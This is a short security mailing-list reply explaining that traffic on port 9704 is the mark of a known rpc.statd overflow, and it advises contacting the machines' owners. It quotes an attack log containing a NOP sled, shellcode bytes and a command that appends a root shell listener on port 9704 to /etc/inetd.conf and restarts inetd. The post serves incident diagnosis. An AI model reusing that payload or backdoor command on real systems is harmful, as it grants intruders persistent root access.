Re: Port 9704

[Graeme Fowler <graeme.f () WEBFUSION CO UK>]

Derek K wrote:
> I'm seeing a lot of traffic from 2 mailservers - it's going out on
port
> 9704 and going in on another box's 9704.  I'm suspicious, and don't
find
> any references to it around.  The 9704->9704 makes me wonder if it
isn't a
> hack of some kind.

Yup. 9704 is the port added to inetd by a pretty well-known overflow for
rpc.statd:

Aug XX 17:13:08 victim rpc.statd[410]: SM_MON request for hostname
containing '/': ^D^D^E^E^F ^F^G^G08049f10 bffff754 000028f8 4d5f4d53
72204e4f 65757165 66207473 6820726f 6e74736f 20656d61 746e6f63
696e6961 2720676e 203a272f
000000000000000000000000000000000000000000000000000000000000000000000000
00000000
000000000000000000000000000000000000000000000000000000000000000000000000
00000000
000000000000000000000000000000000000000000000000000000000000000000000000
00bffff7
0400000000000000000000000000000000000000000000000bffff7050000bffff706000
00000000
000000000000000000000000000000000000000000000000000000000000000000000000
00000000
000000000000000000000000000000000000000000000000000000000000000000000000
00000000
0000000000000bffff707<90><90><90><90><90><90><90><90><90><90><90><90><90
> <90><90
> <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90
> <90><90
> <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>K^<89>v<83>
<8D>^(
<83> <89>^<83> <8D>^.<83> <83> <83>#<89>^
1<83>
<88>F'<88>F*<83> <88>F<89>F+,
<89><8D>N<8D>V<80>1<89>@<80>/bin
/sh -c echo 9704 stream tcp
nowait root /bin/sh sh -i >> /etc/inetd.conf;killall -HUP inetd

...and BONK! they have a rootshell running on 9704.

See http://www.securityfocus.com/bid/1480

I'd let the owners know, pronto. Alternatively if you have any control
over them, get them unplugged.

Regards

Graeme